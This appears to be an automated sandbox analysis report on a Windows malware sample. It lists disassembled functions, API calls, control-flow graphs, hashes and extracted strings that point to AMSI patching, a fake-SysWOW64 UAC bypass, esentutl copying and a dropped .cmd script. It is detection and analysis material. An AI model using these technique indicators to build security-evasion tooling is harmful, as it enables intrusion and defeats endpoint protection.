                                                                                                                    • Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,02B3BB30,00000000,00000000,02B3BB24,00000000,00000000), ref: 02B340CB
                                                                                                                    • Part of subcall function 02B288B8: LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
                                                                                                                    • Part of subcall function 02B288B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920
                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B34277
                                                                                                                    • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                    • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                    • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                  • Sleep.KERNEL32(00004E20,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8), ref: 02B350EE
                                                                                                                    • Part of subcall function 02B2DC04: RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                    • Part of subcall function 02B2DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                    • Part of subcall function 02B2DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                    • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                    • Part of subcall function 02B285BC: WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                  • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                  • API String ID: 2171786310-3926298568
                                                                                                                  • Opcode ID: 40373a53e75ed6e3797e6fdfc6115cfdb8379e227bcd7151bcb12cb0faf1728d
                                                                                                                  • Instruction ID: 3b8046325001ffe7cacf052f232e98a0afcbf1d8c94dbe614ebe35eb282a8c73
                                                                                                                  • Opcode Fuzzy Hash: 40373a53e75ed6e3797e6fdfc6115cfdb8379e227bcd7151bcb12cb0faf1728d
                                                                                                                  • Instruction Fuzzy Hash: 3143F875A0016D8FDB11EB64DD80ADE73B6FF85308F9041E6E109AB628DE30AE85DF51
                                                                                                                  Function 02B2E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 10970 2b2e678-2b2e67c 10971 2b2e681-2b2e686 10970->10971 10971->10971 10972 2b2e688-2b2ec81 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14740 * 2 call 2b14860 call 2b14778 call 2b130d4 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14740 call 2b17f2c call 2b149a0 call 2b14d74 call 2b14df0 call 2b14740 call 2b149a0 call 2b14d74 call 2b14df0 call 2b28788 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c 10971->10972 11175 2b2eee2-2b2ef2f call 2b14500 call 2b14c60 call 2b14500 call 2b14c60 call 2b14500 10972->11175 11176 2b2ec87-2b2eedd call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 WaitForSingleObject CloseHandle * 2 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c * 3 10972->11176 11176->11175
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                    • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                    • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                    • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                    • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession,02B97380), ref: 02B2ED6E
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession), ref: 02B2ED76
                                                                                                                  • CloseHandle.KERNEL32(0000084C,00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C), ref: 02B2ED7F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                  • String ID: )"C:\Users\Public\Libraries\yihfsboC.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                  • API String ID: 3475578485-1266785686
                                                                                                                  • Opcode ID: ef751337df298150dfe6dc4fc987bb46440e269e92c2daed5db3e0f9d9fb0c75
                                                                                                                  • Instruction ID: ee2e09baa7059692488029b4437e5f8af15874bee1075bc78e576d7dddd75aa0
                                                                                                                  • Opcode Fuzzy Hash: ef751337df298150dfe6dc4fc987bb46440e269e92c2daed5db3e0f9d9fb0c75
                                                                                                                  • Instruction Fuzzy Hash: 9722C375A0026D9FEB11FB65D881BCE73B6AF85300F9041E1A149EB254DB30EE49CF66
                                                                                                                  Function 02B11724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 13139 2b11724-2b11736 13140 2b11968-2b1196d 13139->13140 13141 2b1173c-2b1174c 13139->13141 13144 2b11a80-2b11a83 13140->13144 13145 2b11973-2b11984 13140->13145 13142 2b117a4-2b117ad 13141->13142 13143 2b1174e-2b1175b 13141->13143 13142->13143 13152 2b117af-2b117bb 13142->13152 13148 2b11774-2b11780 13143->13148 13149 2b1175d-2b1176a 13143->13149 13146 2b11684-2b116ad VirtualAlloc 13144->13146 13147 2b11a89-2b11a8b 13144->13147 13150 2b11986-2b119a2 13145->13150 13151 2b11938-2b11945 13145->13151 13153 2b116df-2b116e5 13146->13153 13154 2b116af-2b116dc call 2b11644 13146->13154 13158 2b117f0-2b117f9 13148->13158 13159 2b11782-2b11790 13148->13159 13155 2b11794-2b117a1 13149->13155 13156 2b1176c-2b11770 13149->13156 13160 2b119b0-2b119bf 13150->13160 13161 2b119a4-2b119ac 13150->13161 13151->13150 13157 2b11947-2b1195b Sleep 13151->13157 13152->13143 13162 2b117bd-2b117c9 13152->13162 13154->13153 13157->13150 13169 2b1195d-2b11964 Sleep 13157->13169 13166 2b117fb-2b11808 13158->13166 13167 2b1182c-2b11836 13158->13167 13163 2b119c1-2b119d5 13160->13163 13164 2b119d8-2b119e0 13160->13164 13170 2b11a0c-2b11a22 13161->13170 13162->13143 13165 2b117cb-2b117de Sleep 13162->13165 13163->13170 13172 2b119e2-2b119fa 13164->13172 13173 2b119fc-2b119fe call 2b115cc 13164->13173 13165->13143 13171 2b117e4-2b117eb Sleep 13165->13171 13166->13167 13174 2b1180a-2b1181e Sleep 13166->13174 13176 2b118a8-2b118b4 13167->13176 13177 2b11838-2b11863 13167->13177 13169->13151 13178 2b11a24-2b11a32 13170->13178 13179 2b11a3b-2b11a47 13170->13179 13171->13142 13180 2b11a03-2b11a0b 13172->13180 13173->13180 13174->13167 13182 2b11820-2b11827 Sleep 13174->13182 13188 2b118b6-2b118c8 13176->13188 13189 2b118dc-2b118eb call 2b115cc 13176->13189 13183 2b11865-2b11873 13177->13183 13184 2b1187c-2b1188a 13177->13184 13178->13179 13185 2b11a34 13178->13185 13186 2b11a49-2b11a5c 13179->13186 13187 2b11a68 13179->13187 13182->13166 13183->13184 13193 2b11875 13183->13193 13194 2b118f8 13184->13194 13195 2b1188c-2b118a6 call 2b11500 13184->13195 13185->13179 13196 2b11a6d-2b11a7f 13186->13196 13197 2b11a5e-2b11a63 call 2b11500 13186->13197 13187->13196 13190 2b118ca 13188->13190 13191 2b118cc-2b118da 13188->13191 13198 2b118fd-2b11936 13189->13198 13202 2b118ed-2b118f7 13189->13202 13190->13191 13191->13198 13193->13184 13194->13198 13195->13198 13197->13196
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000,?,02B12000), ref: 02B117D0
                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,02B12000), ref: 02B117E6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
                                                                                                                  • Instruction ID: e98d19a584a4a14518f7b71833429673fc6a28459c8dd0196ed9c6544a041184
                                                                                                                  • Opcode Fuzzy Hash: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
                                                                                                                  • Instruction Fuzzy Hash: 3DB15372A203518BCB15CF2CE980315BBF1EB86394F59C6EED65D8B385C735A452CB90
                                                                                                                  Function 02B288B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                    • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                  • String ID: DllGetClassObject$W$amsi
                                                                                                                  • API String ID: 941070894-2671292670
                                                                                                                  • Opcode ID: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
                                                                                                                  • Instruction ID: e7da6ab78f48232b107c71d9bf42d7596247465db451df0a5cebfbcc025119e1
                                                                                                                  • Opcode Fuzzy Hash: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
                                                                                                                  • Instruction Fuzzy Hash: 9DF0A45044C381B9E300E3748C45F4BBFCD4B62264F408A98B1ECAA2D2D679D1089B77
                                                                                                                  Function 02B11A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 13227 2b11a8c-2b11a9b 13228 2b11aa1-2b11aa5 13227->13228 13229 2b11b6c-2b11b6f 13227->13229 13232 2b11aa7-2b11aae 13228->13232 13233 2b11b08-2b11b11 13228->13233 13230 2b11b75-2b11b7f 13229->13230 13231 2b11c5c-2b11c60 13229->13231 13235 2b11b81-2b11b8d 13230->13235 13236 2b11b3c-2b11b49 13230->13236 13239 2b11c66-2b11c6b 13231->13239 13240 2b116e8-2b1170b call 2b11644 VirtualFree 13231->13240 13237 2b11ab0-2b11abb 13232->13237 13238 2b11adc-2b11ade 13232->13238 13233->13232 13234 2b11b13-2b11b27 Sleep 13233->13234 13234->13232 13241 2b11b2d-2b11b38 Sleep 13234->13241 13243 2b11bc4-2b11bd2 13235->13243 13244 2b11b8f-2b11b92 13235->13244 13236->13235 13242 2b11b4b-2b11b5f Sleep 13236->13242 13245 2b11ac4-2b11ad9 13237->13245 13246 2b11abd-2b11ac2 13237->13246 13247 2b11ae0-2b11af1 13238->13247 13248 2b11af3 13238->13248 13255 2b11716 13240->13255 13256 2b1170d-2b11714 13240->13256 13241->13233 13242->13235 13254 2b11b61-2b11b68 Sleep 13242->13254 13252 2b11bd4-2b11bd9 call 2b114c0 13243->13252 13253 2b11b96-2b11b9a 13243->13253 13244->13253 13247->13248 13250 2b11af6-2b11b03 13247->13250 13248->13250 13250->13230 13252->13253 13258 2b11bdc-2b11be9 13253->13258 13259 2b11b9c-2b11ba2 13253->13259 13254->13236 13260 2b11719-2b11723 13255->13260 13256->13260 13258->13259 13262 2b11beb-2b11bf2 call 2b114c0 13258->13262 13263 2b11bf4-2b11bfe 13259->13263 13264 2b11ba4-2b11bc2 call 2b11500 13259->13264 13262->13259 13266 2b11c00-2b11c28 VirtualFree 13263->13266 13267 2b11c2c-2b11c59 call 2b11560 13263->13267
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,00000000,02B11FE4), ref: 02B11B17
                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B11FE4), ref: 02B11B31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
                                                                                                                  • Instruction ID: ff043b244d0d6a75d583dfe07d5e3ff072b404c752661627741e3c0732ec4baa
                                                                                                                  • Opcode Fuzzy Hash: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
                                                                                                                  • Instruction Fuzzy Hash: B351EE71A212408FDB15CF6CCA84766BBE0EF4A314F9885EED648CB2C2E774C445CBA1
                                                                                                                  Function 02B2E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                  • Opcode ID: 8605150bab238d34b3bb322b5d92511eeb0669703004dc3ed1fa2a87fbb62e13
                                                                                                                  • Instruction ID: fe3f4b3cd23fe1894d469b33237c194177b442188e45fbcf903a8c4e727dda45
                                                                                                                  • Opcode Fuzzy Hash: 8605150bab238d34b3bb322b5d92511eeb0669703004dc3ed1fa2a87fbb62e13
                                                                                                                  • Instruction Fuzzy Hash: 8B413975B002189FEB01EBA4D881ADEB3FAEF88700FA044B6E145E7255DA70FD098F55
                                                                                                                  Function 02B285BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                  • Opcode ID: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
                                                                                                                  • Instruction ID: 474f45942380282da43f5fc0f3f10ac7b2e9ad0c667e0a98645b595e1c511140
                                                                                                                  • Opcode Fuzzy Hash: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
                                                                                                                  • Instruction Fuzzy Hash: 560181B1694314BFEB01EFA4DC01F5A77FDE709700FA084A0F908D3650DA34AD159A25
                                                                                                                  Function 02B285BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                  • Opcode ID: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
                                                                                                                  • Instruction ID: 78092c23edb0741e8d385a2d3ff20ef1e16d16e6999086907ed04610de41314e
                                                                                                                  • Opcode Fuzzy Hash: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
                                                                                                                  • Instruction Fuzzy Hash: 2CF081B1694314BFEB01EFA4DC01F5A77FDE709700FA084A0F908D3650DA34AD159A25
